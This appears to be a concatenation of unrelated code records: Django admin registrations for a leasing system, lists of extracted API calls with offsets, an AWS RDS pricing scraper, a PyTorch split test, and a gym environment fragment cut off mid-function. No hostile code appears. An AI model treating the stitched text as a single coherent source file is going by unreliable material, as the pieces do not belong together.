admin.site.register(Municipality, MunicipalityAdmin)
admin.site.register(NoticePeriod)
admin.site.register(Plot, PlotAdmin)
admin.site.register(PlanUnit, PlanUnitAdmin)
admin.site.register(PlanUnitState, NameAdmin)
admin.site.register(PlanUnitIntendedUse, NameAdmin)
admin.site.register(PlanUnitType, NameAdmin)
admin.site.register(PlotDivisionState, NameAdmin)
admin.site.register(PlotSearch, PlotSearchAdmin)
admin.site.register(PlotSearchStage, NameAdmin)
admin.site.register(PlotSearchSubtype, NameAdmin)
admin.site.register(PlotSearchType, NameAdmin)
admin.site.register(ReceivableType)
admin.site.register(Regulation, NameAdmin)
admin.site.register(Rent, RentAdmin)
admin.site.register(RentIntendedUse, NameAdmin)
admin.site.register(ReservationProcedure, NameAdmin)
admin.site.register(SpecialProject, NameAdmin)
admin.site.register(StatisticalUse, NameAdmin)
admin.site.register(SupportiveHousing, NameAdmin)
admin.site.register(Tenant, TenantAdmin)
admin.site.register(TenantContact, TenantContactAdmin)
admin.site.register(Contract, ContractAdmin)
admin.site.register(ContractType, NameAdmin)
admin.site.register(Decision, DecisionAdmin)
admin.site.register(DecisionType, DecisionTypeAdmin)
admin.site.register(DecisionMaker, NameAdmin)
admin.site.register(ConditionType, NameAdmin)
admin.site.register(BasisOfRent, BasisOfRentAdmin)
admin.site.register(BasisOfRentPlotType, NameAdmin)
admin.site.register(BasisOfRentBuildPermissionType, NameAdmin)
admin.site.register(UiData, UiDataAdmin)
admin.site.register(Vat, VatAdmin)
admin.site.register(LandUseAgreementType, NameAdmin)
admin.site.register(LandUseAgreementStatus, NameAdmin)
admin.site.register(LandUseAgreementDefinition, NameAdmin)
admin.site.register(LandUseAgreementDecisionType, NameAdmin)
admin.site.register(LandUseAgreementConditionFormOfManagement, NameAdmin)
admin.site.register(LandUseAgreementDecisionConditionType, NameAdmin)
admin.site.register(LandUseAgreementDecision, LandUseAgreementDecisionAdmin)
admin.site.register(LandUseAgreement, LandUseAgreementAdmin)
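# Hedged sketch of how a further admin would follow this module's conventions
# (FieldPermissionsModelAdmin base, raw lease FK, select_related over the
# lease identifier chain); HypotheticalAttachment is not a real leasing model.
class HypotheticalAttachmentAdmin(FieldPermissionsModelAdmin):
    list_display = ("lease", "created_at")
    raw_id_fields = ("lease",)
    def get_queryset(self, request):
        qs = super().get_queryset(request)
        return qs.select_related(
            "lease__type",
            "lease__municipality",
            "lease__district",
            "lease__identifier",
            "lease__identifier__type",
            "lease__identifier__municipality",
            "lease__identifier__district",
        )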
|
[
"django.contrib.gis.admin.site.register",
"django.utils.translation.ugettext_lazy"
] |
[((19480, 19516), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['Area', 'AreaAdmin'], {}), '(Area, AreaAdmin)\n', (19499, 19516), False, 'from django.contrib.gis import admin\n'), ((19517, 19565), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['AreaSource', 'AreaSourceAdmin'], {}), '(AreaSource, AreaSourceAdmin)\n', (19536, 19565), False, 'from django.contrib.gis import admin\n'), ((19566, 19610), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['AreaNote', 'AreaNoteAdmin'], {}), '(AreaNote, AreaNoteAdmin)\n', (19585, 19610), False, 'from django.contrib.gis import admin\n'), ((19611, 19643), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['BankHoliday'], {}), '(BankHoliday)\n', (19630, 19643), False, 'from django.contrib.gis import admin\n'), ((19644, 19686), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['Contact', 'ContactAdmin'], {}), '(Contact, ContactAdmin)\n', (19663, 19686), False, 'from django.contrib.gis import admin\n'), ((19687, 19729), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['Comment', 'CommentAdmin'], {}), '(Comment, CommentAdmin)\n', (19706, 19729), False, 'from django.contrib.gis import admin\n'), ((19730, 19774), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['CommentTopic', 'NameAdmin'], {}), '(CommentTopic, NameAdmin)\n', (19749, 19774), False, 'from django.contrib.gis import admin\n'), ((19775, 19821), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['CollateralType', 'NameAdmin'], {}), '(CollateralType, NameAdmin)\n', (19794, 19821), False, 'from django.contrib.gis import admin\n'), ((19822, 19896), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['CollectionCourtDecision', 'CollectionCourtDecisionAdmin'], {}), '(CollectionCourtDecision, CollectionCourtDecisionAdmin)\n', (19841, 19896), False, 'from django.contrib.gis import admin\n'), ((19897, 19957), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['CollectionLetter', 'CollectionLetterAdmin'], {}), '(CollectionLetter, CollectionLetterAdmin)\n', (19916, 19957), False, 'from django.contrib.gis import admin\n'), ((19958, 20034), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['CollectionLetterTemplate', 'CollectionLetterTemplateAdmin'], {}), '(CollectionLetterTemplate, CollectionLetterTemplateAdmin)\n', (19977, 20034), False, 'from django.contrib.gis import admin\n'), ((20035, 20091), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['CollectionNote', 'CollectionNoteAdmin'], {}), '(CollectionNote, CollectionNoteAdmin)\n', (20054, 20091), False, 'from django.contrib.gis import admin\n'), ((20092, 20136), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['District', 'DistrictAdmin'], {}), '(District, DistrictAdmin)\n', (20111, 20136), False, 'from django.contrib.gis import admin\n'), ((20137, 20178), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['Financing', 'NameAdmin'], {}), '(Financing, NameAdmin)\n', (20156, 20178), False, 'from django.contrib.gis import admin\n'), ((20179, 20216), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['Hitas', 'NameAdmin'], {}), '(Hitas, NameAdmin)\n', (20198, 20216), False, 'from django.contrib.gis import admin\n'), ((20217, 20255), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['Index', 'IndexAdmin'], {}), '(Index, IndexAdmin)\n', (20236, 20255), False, 'from django.contrib.gis import admin\n'), ((20256, 20346), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['InfillDevelopmentCompensation', 'InfillDevelopmentCompensationAdmin'], {}), '(InfillDevelopmentCompensation,\n    InfillDevelopmentCompensationAdmin)\n', (20275, 20346), False, 'from django.contrib.gis import admin\n'), ((20343, 20443), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['InfillDevelopmentCompensationLease', 'InfillDevelopmentCompensationLeaseAdmin'], {}), '(InfillDevelopmentCompensationLease,\n    InfillDevelopmentCompensationLeaseAdmin)\n', (20362, 20443), False, 'from django.contrib.gis import admin\n'), ((20446, 20489), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['IntendedUse', 'NameAdmin'], {}), '(IntendedUse, NameAdmin)\n', (20465, 20489), False, 'from django.contrib.gis import admin\n'), ((20490, 20542), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['InterestRate', 'InterestRateAdmin'], {}), '(InterestRate, InterestRateAdmin)\n', (20509, 20542), False, 'from django.contrib.gis import admin\n'), ((20543, 20591), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['Inspection', 'InspectionAdmin'], {}), '(Inspection, InspectionAdmin)\n', (20562, 20591), False, 'from django.contrib.gis import admin\n'), ((20592, 20634), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['Invoice', 'InvoiceAdmin'], {}), '(Invoice, InvoiceAdmin)\n', (20611, 20634), False, 'from django.contrib.gis import admin\n'), ((20635, 20685), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['InvoiceNote', 'InvoiceNoteAdmin'], {}), '(InvoiceNote, InvoiceNoteAdmin)\n', (20654, 20685), False, 'from django.contrib.gis import admin\n'), ((20686, 20734), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['InvoiceSet', 'InvoiceSetAdmin'], {}), '(InvoiceSet, InvoiceSetAdmin)\n', (20705, 20734), False, 'from django.contrib.gis import admin\n'), ((20735, 20773), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['Lease', 'LeaseAdmin'], {}), '(Lease, LeaseAdmin)\n', (20754, 20773), False, 'from django.contrib.gis import admin\n'), ((20774, 20820), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['LeaseArea', 'LeaseAreaAdmin'], {}), '(LeaseArea, LeaseAreaAdmin)\n', (20793, 20820), False, 'from django.contrib.gis import admin\n'), ((20821, 20879), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['LeaseIdentifier', 'LeaseIdentifierAdmin'], {}), '(LeaseIdentifier, LeaseIdentifierAdmin)\n', (20840, 20879), False, 'from django.contrib.gis import admin\n'), ((20880, 20934), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['LeaseStateLog', 'LeaseStateLogAdmin'], {}), '(LeaseStateLog, LeaseStateLogAdmin)\n', (20899, 20934), False, 'from django.contrib.gis import admin\n'), ((20935, 20981), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['LeaseType', 'LeaseTypeAdmin'], {}), '(LeaseType, LeaseTypeAdmin)\n', (20954, 20981), False, 'from django.contrib.gis import admin\n'), ((20982, 21044), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['LeaseholdTransfer', 'LeaseholdTransferAdmin'], {}), '(LeaseholdTransfer, LeaseholdTransferAdmin)\n', (21001, 21044), False, 'from django.contrib.gis import admin\n'), ((21045, 21130), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['LeaseholdTransferImportLog', 'LeaseholdTransferImportLogAdmin'], {}), '(LeaseholdTransferImportLog,\n    LeaseholdTransferImportLogAdmin)\n', (21064, 21130), False, 'from django.contrib.gis import admin\n'), ((21126, 21168), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['Management', 'NameAdmin'], {}), '(Management, NameAdmin)\n', (21145, 21168), False, 'from django.contrib.gis import admin\n'), ((21169, 21221), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['Municipality', 'MunicipalityAdmin'], {}), '(Municipality, MunicipalityAdmin)\n', (21188, 21221), False, 'from django.contrib.gis import admin\n'), ((21222, 21255), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['NoticePeriod'], {}), '(NoticePeriod)\n', (21241, 21255), False, 'from django.contrib.gis import admin\n'), ((21256, 21292), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['Plot', 'PlotAdmin'], {}), '(Plot, PlotAdmin)\n', (21275, 21292), False, 'from django.contrib.gis import admin\n'), ((21293, 21337), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['PlanUnit', 'PlanUnitAdmin'], {}), '(PlanUnit, PlanUnitAdmin)\n', (21312, 21337), False, 'from django.contrib.gis import admin\n'), ((21338, 21383), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['PlanUnitState', 'NameAdmin'], {}), '(PlanUnitState, NameAdmin)\n', (21357, 21383), False, 'from django.contrib.gis import admin\n'), ((21384, 21435), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['PlanUnitIntendedUse', 'NameAdmin'], {}), '(PlanUnitIntendedUse, NameAdmin)\n', (21403, 21435), False, 'from django.contrib.gis import admin\n'), ((21436, 21480), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['PlanUnitType', 'NameAdmin'], {}), '(PlanUnitType, NameAdmin)\n', (21455, 21480), False, 'from django.contrib.gis import admin\n'), ((21481, 21530), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['PlotDivisionState', 'NameAdmin'], {}), '(PlotDivisionState, NameAdmin)\n', (21500, 21530), False, 'from django.contrib.gis import admin\n'), ((21531, 21579), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['PlotSearch', 'PlotSearchAdmin'], {}), '(PlotSearch, PlotSearchAdmin)\n', (21550, 21579), False, 'from django.contrib.gis import admin\n'), ((21580, 21627), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['PlotSearchStage', 'NameAdmin'], {}), '(PlotSearchStage, NameAdmin)\n', (21599, 21627), False, 'from django.contrib.gis import admin\n'), ((21628, 21677), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['PlotSearchSubtype', 'NameAdmin'], {}), '(PlotSearchSubtype, NameAdmin)\n', (21647, 21677), False, 'from django.contrib.gis import admin\n'), ((21678, 21724), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['PlotSearchType', 'NameAdmin'], {}), '(PlotSearchType, NameAdmin)\n', (21697, 21724), False, 'from django.contrib.gis import admin\n'), ((21725, 21760), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['ReceivableType'], {}), '(ReceivableType)\n', (21744, 21760), False, 'from django.contrib.gis import admin\n'), ((21761, 21803), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['Regulation', 'NameAdmin'], {}), '(Regulation, NameAdmin)\n', (21780, 21803), False, 'from django.contrib.gis import admin\n'), ((21804, 21840), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['Rent', 'RentAdmin'], {}), '(Rent, RentAdmin)\n', (21823, 21840), False, 'from django.contrib.gis import admin\n'), ((21841, 21888), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['RentIntendedUse', 'NameAdmin'], {}), '(RentIntendedUse, NameAdmin)\n', (21860, 21888), False, 'from django.contrib.gis import admin\n'), ((21889, 21941), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['ReservationProcedure', 'NameAdmin'], {}), '(ReservationProcedure, NameAdmin)\n', (21908, 21941), False, 'from django.contrib.gis import admin\n'), ((21942, 21988), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['SpecialProject', 'NameAdmin'], {}), '(SpecialProject, NameAdmin)\n', (21961, 21988), False, 'from django.contrib.gis import admin\n'), ((21989, 22035), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['StatisticalUse', 'NameAdmin'], {}), '(StatisticalUse, NameAdmin)\n', (22008, 22035), False, 'from django.contrib.gis import admin\n'), ((22036, 22085), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['SupportiveHousing', 'NameAdmin'], {}), '(SupportiveHousing, NameAdmin)\n', (22055, 22085), False, 'from django.contrib.gis import admin\n'), ((22086, 22126), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['Tenant', 'TenantAdmin'], {}), '(Tenant, TenantAdmin)\n', (22105, 22126), False, 'from django.contrib.gis import admin\n'), ((22127, 22181), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['TenantContact', 'TenantContactAdmin'], {}), '(TenantContact, TenantContactAdmin)\n', (22146, 22181), False, 'from django.contrib.gis import admin\n'), ((22182, 22226), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['Contract', 'ContractAdmin'], {}), '(Contract, ContractAdmin)\n', (22201, 22226), False, 'from django.contrib.gis import admin\n'), ((22227, 22271), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['ContractType', 'NameAdmin'], {}), '(ContractType, NameAdmin)\n', (22246, 22271), False, 'from django.contrib.gis import admin\n'), ((22272, 22316), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['Decision', 'DecisionAdmin'], {}), '(Decision, DecisionAdmin)\n', (22291, 22316), False, 'from django.contrib.gis import admin\n'), ((22317, 22369), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['DecisionType', 'DecisionTypeAdmin'], {}), '(DecisionType, DecisionTypeAdmin)\n', (22336, 22369), False, 'from django.contrib.gis import admin\n'), ((22370, 22415), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['DecisionMaker', 'NameAdmin'], {}), '(DecisionMaker, NameAdmin)\n', (22389, 22415), False, 'from django.contrib.gis import admin\n'), ((22416, 22461), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['ConditionType', 'NameAdmin'], {}), '(ConditionType, NameAdmin)\n', (22435, 22461), False, 'from django.contrib.gis import admin\n'), ((22462, 22512), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['BasisOfRent', 'BasisOfRentAdmin'], {}), '(BasisOfRent, BasisOfRentAdmin)\n', (22481, 22512), False, 'from django.contrib.gis import admin\n'), ((22513, 22564), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['BasisOfRentPlotType', 'NameAdmin'], {}), '(BasisOfRentPlotType, NameAdmin)\n', (22532, 22564), False, 'from django.contrib.gis import admin\n'), ((22565, 22627), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['BasisOfRentBuildPermissionType', 'NameAdmin'], {}), '(BasisOfRentBuildPermissionType, NameAdmin)\n', (22584, 22627), False, 'from django.contrib.gis import admin\n'), ((22628, 22668), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['UiData', 'UiDataAdmin'], {}), '(UiData, UiDataAdmin)\n', (22647, 22668), False, 'from django.contrib.gis import admin\n'), ((22669, 22703), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['Vat', 'VatAdmin'], {}), '(Vat, VatAdmin)\n', (22688, 22703), False, 'from django.contrib.gis import admin\n'), ((22705, 22757), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['LandUseAgreementType', 'NameAdmin'], {}), '(LandUseAgreementType, NameAdmin)\n', (22724, 22757), False, 'from django.contrib.gis import admin\n'), ((22758, 22812), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['LandUseAgreementStatus', 'NameAdmin'], {}), '(LandUseAgreementStatus, NameAdmin)\n', (22777, 22812), False, 'from django.contrib.gis import admin\n'), ((22813, 22871), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['LandUseAgreementDefinition', 'NameAdmin'], {}), '(LandUseAgreementDefinition, NameAdmin)\n', (22832, 22871), False, 'from django.contrib.gis import admin\n'), ((22872, 22932), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['LandUseAgreementDecisionType', 'NameAdmin'], {}), '(LandUseAgreementDecisionType, NameAdmin)\n', (22891, 22932), False, 'from django.contrib.gis import admin\n'), ((22933, 23006), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['LandUseAgreementConditionFormOfManagement', 'NameAdmin'], {}), '(LandUseAgreementConditionFormOfManagement, NameAdmin)\n', (22952, 23006), False, 'from django.contrib.gis import admin\n'), ((23007, 23076), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['LandUseAgreementDecisionConditionType', 'NameAdmin'], {}), '(LandUseAgreementDecisionConditionType, NameAdmin)\n', (23026, 23076), False, 'from django.contrib.gis import admin\n'), ((23077, 23153), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['LandUseAgreementDecision', 'LandUseAgreementDecisionAdmin'], {}), '(LandUseAgreementDecision, LandUseAgreementDecisionAdmin)\n', (23096, 23153), False, 'from django.contrib.gis import admin\n'), ((23154, 23214), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['LandUseAgreement', 'LandUseAgreementAdmin'], {}), '(LandUseAgreement, LandUseAgreementAdmin)\n', (23173, 23214), False, 'from django.contrib.gis import admin\n'), ((4244, 4254), 'django.utils.translation.ugettext_lazy', '_', (['"""Lease"""'], {}), "('Lease')\n", (4245, 4254), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((17556, 17566), 'django.utils.translation.ugettext_lazy', '_', (['"""Lease"""'], {}), "('Lease')\n", (17557, 17566), True, 'from django.utils.translation import ugettext_lazy as _\n')]
|
#!/usr/bin/env python
import requests
import json
from json import encoder
import sys
def add_pretty_names(instances):
family_names = {
't2': 'T2 General Purpose',
'r3': 'R3 Memory Optimized',
'r4': 'R4 Memory Optimized',
'c3': 'C3 High-CPU',
'c4': 'C4 High-CPU',
'm3': 'M3 General Purpose',
'i3': 'I3 High I/O',
'cg1': 'Cluster GPU',
'cc2': 'Cluster Compute',
'cr1': 'High Memory Cluster',
'hs1': 'High Storage',
'c1' : 'C1 High-CPU',
'hi1': 'HI1. High I/O',
'm2' : 'M2 High Memory',
'm1' : 'M1 General Purpose',
'm4' : 'M4 General Purpose'
}
for k in instances:
i = instances[k]
# instance type format looks like "db.r4.large"; dropping the "db" prefix
pieces = i['instance_type'].split('.')
family = pieces[1]
short = pieces[2]
prefix = family_names.get(family, family.upper())
extra = None
if short.startswith('8x'):
extra = 'Eight'
elif short.startswith('4x'):
extra = 'Quadruple'
elif short.startswith('2x'):
extra = 'Double'
elif short.startswith('10x'):
extra = 'Deca'
elif short.startswith('x'):
extra = ''
bits = [prefix]
if extra is not None:
bits.extend([extra, 'Extra'])
short = 'Large'
bits.append(short.capitalize())
i['pretty_name'] = ' '.join([b for b in bits if b])
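# Worked examples of the naming logic above (derived from the family table):
#   'db.r4.8xlarge' -> prefix 'R4 Memory Optimized', '8x' size -> 'Eight Extra'
#                   -> pretty_name 'R4 Memory Optimized Eight Extra Large'
#   'db.m4.large'   -> no size prefix matches -> 'M4 General Purpose Large'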
def scrape(output_file, input_file=None):
# if an argument is given, use that as the path for the json file
if input_file:
with open(input_file) as json_data:
data = json.load(json_data)
else:
price_index = 'https://pricing.us-east-1.amazonaws.com/offers/v1.0/aws/AmazonRDS/current/index.json'
index = requests.get(price_index)
data = index.json()
rds_instances = {}
instances = {}
# region mapping, someone thought it was handy not to include the region id's :(
regions = {
"AWS GovCloud (US)": 'us-gov-west-1',
"Asia Pacific (Mumbai)": 'ap-south-1',
"Asia Pacific (Seoul)": 'ap-northeast-2',
"Asia Pacific (Singapore)": 'ap-southeast-1',
"Asia Pacific (Sydney)": 'ap-southeast-2',
"Asia Pacific (Tokyo)": 'ap-northeast-1',
"Asia Pacific (Osaka-Local)": 'ap-northeast-3',
"Canada (Central)": 'ca-central-1',
"EU (Frankfurt)": 'eu-central-1',
"EU (Ireland)": 'eu-west-1',
"EU (London)": 'eu-west-2',
"EU (Paris)": 'eu-west-3',
"South America (Sao Paulo)": 'sa-east-1',
"US East (N. Virginia)": 'us-east-1',
"US East (Ohio)": 'us-east-2',
"US West (N. California)": 'us-west-1',
"US West (Oregon)": 'us-west-2',
}
# loop through products, and only fetch available instances for now
    for sku, product in data['products'].items():
if product.get('productFamily', None) == 'Database Instance':
# map the region
try:
region = regions[product['attributes']['location']]
except KeyError as e:
if product['attributes']['location'] == 'Any':
region = 'us-east-1'
else:
raise
# set the attributes in line with the ec2 index
attributes = product['attributes']
attributes['region'] = region
attributes['memory'] = attributes['memory'].split(' ')[0]
attributes['network_performance'] = attributes['networkPerformance']
attributes['family'] = attributes['instanceFamily']
attributes['instance_type'] = attributes['instanceType']
attributes['database_engine'] = attributes['databaseEngine']
attributes['arch'] = attributes['processorArchitecture']
attributes['pricing'] = {}
attributes['pricing'][region] = {}
rds_instances[sku] = attributes
if attributes['instance_type'] not in instances.keys():
instances[attributes['instance_type']] = attributes
instances[attributes['instance_type']]['pricing'] = {}
# Parse ondemand pricing
    for sku, offers in data['terms']['OnDemand'].items():
        for code, offer in offers.items():
            for key, dimension in offer['priceDimensions'].items():
# skip these for now
if any(descr in dimension['description'].lower() for descr in ['transfer', 'global', 'storage', 'iops', 'requests', 'multi-az']):
continue
instance = rds_instances.get(sku)
if not instance:
print("ERROR: Instance type not found for sku={}".format(sku))
continue
if instance['region'] not in instances[instance['instance_type']]['pricing']:
instances[instance['instance_type']]['pricing'][instance['region']] = {}
instances[instance['instance_type']]['pricing'][instance['region']][instance['database_engine']] = {
'ondemand': float(dimension['pricePerUnit']['USD'])
}
reserved_mapping = {
'3yr Partial Upfront': 'yrTerm3.partialUpfront',
'1yr Partial Upfront': 'yrTerm1.partialUpfront',
'3yr All Upfront': 'yrTerm3.allUpfront',
'1yr All Upfront': 'yrTerm1.allUpfront',
'1yr No Upfront': 'yrTerm1.noUpfront'
}
# Parse reserved pricing
    for sku, offers in data['terms']['Reserved'].items():
        for code, offer in offers.items():
            for key, dimension in offer['priceDimensions'].items():
# skip multi-az
if rds_instances[sku]['deploymentOption'] != 'Single-AZ':
continue
instance = rds_instances[sku]
region = rds_instances[sku]['region']
# create a regional hash
if region not in instances[instance['instance_type']]['pricing']:
instances[instance['instance_type']]['pricing'][region] = {}
# create a reserved hash
if 'reserved' not in instances[instance['instance_type']]['pricing'][region][instance['database_engine']]:
instances[instance['instance_type']]['pricing'][region][instance['database_engine']]['reserved'] = {}
# store the pricing in placeholder field
reserved_type = "%s %s" % (offer['termAttributes']['LeaseContractLength'], offer['termAttributes']['PurchaseOption'])
instances[instance['instance_type']]['pricing'][region][instance['database_engine']]['reserved']['%s-%s' % (reserved_mapping[reserved_type], dimension['unit'].lower())] = float(dimension['pricePerUnit']['USD'])
# if instance['instance_type'] == 'db.m3.medium' and region == 'eu-west-1' and instance['database_engine'].lower() == 'mysql':
# print offer
# print instance['database_engine']
# print dimension
# print reserved_type
# print dimension['pricePerUnit']['USD'], float(dimension['pricePerUnit']['USD'])
# print instances[instance['instance_type']]['pricing'][region][instance['database_engine']]['reserved']
# print json.dumps(instances['db.m3.medium']['pricing']['eu-west-1']['MySQL'], indent=4)
# Calculate all reserved effective pricings (upfront hourly + hourly price)
    for instance_type, instance in instances.items():
        for region, pricing in instance['pricing'].items():
            for engine, prices in pricing.items():
if 'reserved' not in prices:
continue
try:
# no multi-az here
reserved_prices = {
'yrTerm3.partialUpfront': (prices['reserved']['yrTerm3.partialUpfront-quantity'] / (365 * 3) / 24) + prices['reserved']['yrTerm3.partialUpfront-hrs'],
'yrTerm1.partialUpfront': (prices['reserved']['yrTerm1.partialUpfront-quantity'] / 365 / 24) + prices['reserved']['yrTerm1.partialUpfront-hrs'],
'yrTerm3.allUpfront': (prices['reserved']['yrTerm3.allUpfront-quantity'] / (365 * 3) / 24) + prices['reserved']['yrTerm3.allUpfront-hrs'],
'yrTerm1.allUpfront': (prices['reserved']['yrTerm1.allUpfront-quantity'] / 365 / 24) + prices['reserved']['yrTerm1.allUpfront-hrs'],
'yrTerm1.noUpfront': prices['reserved']['yrTerm1.noUpfront-hrs'],
}
instances[instance_type]['pricing'][region][engine]['reserved'] = reserved_prices
except Exception as e:
print("ERROR: Trouble generating RDS reserved price for {}: {!r}".format(instance_type, e))
# print json.dumps(instances['db.m3.medium']['pricing']['eu-west-1']['MySQL'], indent=4)
add_pretty_names(instances)
    # write output to file (note: FLOAT_REPR is honoured only by Python 2's
    # pure-Python JSON encoder; under Python 3 it is a no-op)
    encoder.FLOAT_REPR = lambda o: format(o, '.5f')
    with open(output_file, 'w') as outfile:
        json.dump(list(instances.values()), outfile, indent=4)
if __name__ == '__main__':
input_file = None
if len(sys.argv) > 1:
input_file = sys.argv[1]
output_file = './www/rds/instances.json'
scrape(output_file, input_file)
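# Worked example of the effective reserved price computed above (assumed
# figures): a 3yr partial-upfront offer with a 2628.0 USD upfront quantity and
# a 0.10 USD hourly rate works out to 2628.0 / (365 * 3) / 24 + 0.10 = 0.20
# USD per effective hour.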
|
[
"json.load",
"requests.get"
] |
[((1897, 1922), 'requests.get', 'requests.get', (['price_index'], {}), '(price_index)\n', (1909, 1922), False, 'import requests\n'), ((1741, 1761), 'json.load', 'json.load', (['json_data'], {}), '(json_data)\n', (1750, 1761), False, 'import json\n')]
|
from __future__ import absolute_import, division, print_function, unicode_literals
import torch
from tests import utils
class SimpleSplitModel(torch.nn.Module):
def __init__(self, split_size_or_sections, dimension):
super(SimpleSplitModel, self).__init__()
self.split_size_or_sections = split_size_or_sections
self.dimension = dimension
def forward(self, x):
return torch.split(x, self.split_size_or_sections, self.dimension)
class TestSplit(utils.TorchGlowTestCase):
@utils.deterministic_expand(
[
lambda: (torch.randn(8), 4, 0),
lambda: (torch.randn(10), [1, 2, 3, 4], 0),
lambda: (torch.randn(10, 10, 10), 3, 2),
lambda: (torch.randn(100, 100), [25, 50, 25], 1),
lambda: (torch.randn(100, 100), [25, 50, 25], -2),
lambda: (torch.randn(100, 100), 25, -1),
]
)
def test_split(self, tensor, split_size_or_sections, dimension):
utils.compare_tracing_methods(
SimpleSplitModel(split_size_or_sections, dimension), tensor
)
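# A quick check of the torch.split semantics exercised above (not part of the
# original suite): an int size chunks evenly, while a list of sizes must sum
# to the length of the chosen dimension.
if __name__ == "__main__":
    chunks = torch.split(torch.randn(10), [1, 2, 3, 4], 0)
    print([tuple(c.shape) for c in chunks])  # [(1,), (2,), (3,), (4,)]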
|
[
"torch.split",
"torch.randn"
] |
[((410, 469), 'torch.split', 'torch.split', (['x', 'self.split_size_or_sections', 'self.dimension'], {}), '(x, self.split_size_or_sections, self.dimension)\n', (421, 469), False, 'import torch\n'), ((578, 592), 'torch.randn', 'torch.randn', (['(8)'], {}), '(8)\n', (589, 592), False, 'import torch\n'), ((622, 637), 'torch.randn', 'torch.randn', (['(10)'], {}), '(10)\n', (633, 637), False, 'import torch\n'), ((678, 701), 'torch.randn', 'torch.randn', (['(10)', '(10)', '(10)'], {}), '(10, 10, 10)\n', (689, 701), False, 'import torch\n'), ((731, 752), 'torch.randn', 'torch.randn', (['(100)', '(100)'], {}), '(100, 100)\n', (742, 752), False, 'import torch\n'), ((793, 814), 'torch.randn', 'torch.randn', (['(100)', '(100)'], {}), '(100, 100)\n', (804, 814), False, 'import torch\n'), ((856, 877), 'torch.randn', 'torch.randn', (['(100)', '(100)'], {}), '(100, 100)\n', (867, 877), False, 'import torch\n')]
|
from typing import Any, List, Dict, Union, Optional
import time
import gym
import gym_hybrid
import copy
import numpy as np
from easydict import EasyDict
from ding.envs import BaseEnv, BaseEnvTimestep, BaseEnvInfo
from ding.envs.common import EnvElementInfo, affine_transform
from ding.torch_utils import to_ndarray, to_list
from ding.utils import ENV_REGISTRY
@ENV_REGISTRY.register('gym_hybrid')
class GymHybridEnv(BaseEnv):
default_env_id = ['Sliding-v0', 'Moving-v0']
def __init__(self, cfg: EasyDict) -> None:
self._cfg = cfg
self._env_id = cfg.env_id
assert self._env_id in self.default_env_id
self._act_scale = cfg.act_scale
self._init_flag = False
self._replay_path = None
def reset(self) -> np.ndarray:
if not self._init_flag:
self._env = gym.make(self._env_id)
if self._replay_path is not None:
self._env = gym.wrappers.Monitor(
self._env, self._replay_path, video_callable=lambda episode_id: True, force=True
)
